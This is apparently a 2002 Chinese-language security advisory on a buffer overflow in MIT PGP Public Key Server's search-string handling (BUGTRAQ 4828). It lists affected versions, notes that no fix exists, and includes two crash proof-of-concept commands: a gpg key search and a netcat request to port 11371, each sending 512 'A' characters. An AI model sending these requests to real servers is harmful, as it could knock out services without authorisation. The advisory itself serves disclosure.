MIT PGP Public Key Server搜索字符串存在缓冲溢出漏洞

发布时间：2002-05-28
更新时间：2002-05-28
严重程度：高
威胁程度：普通用户访问权限
错误类型：边界检查错误
利用方式：服务器模式

BUGTRAQ ID：4828

受影响系统

MIT PGP Public Key Server 0.9.2
MIT PGP Public Key Server 0.9.4

详细描述
PGP Public Key Server是免费开放源代码的程序，可使用在多种系统平台下。

PGP Public Key Server没有正确处理长字符串查询，在某些条件下，传递超长字符串可导致缓冲溢出，由于数据传递通过isalnum() 和tolower()可导致利用漏洞困难增加。

测试代码
gpg --search-keys `perl -e "print 'A'x512"`

echo -e "GET /pks/lookup?op=index&search=`perl -e "print 'A'x512"`"| nc example.com 11371

解决方案
尚无

相关信息
Max <rusmir@tula.net>.
参考：http://online.securityfocus.com/archive/1/274107

最近严重漏洞

MIT PGP Public Key Server搜索字符串存在缓冲溢出漏洞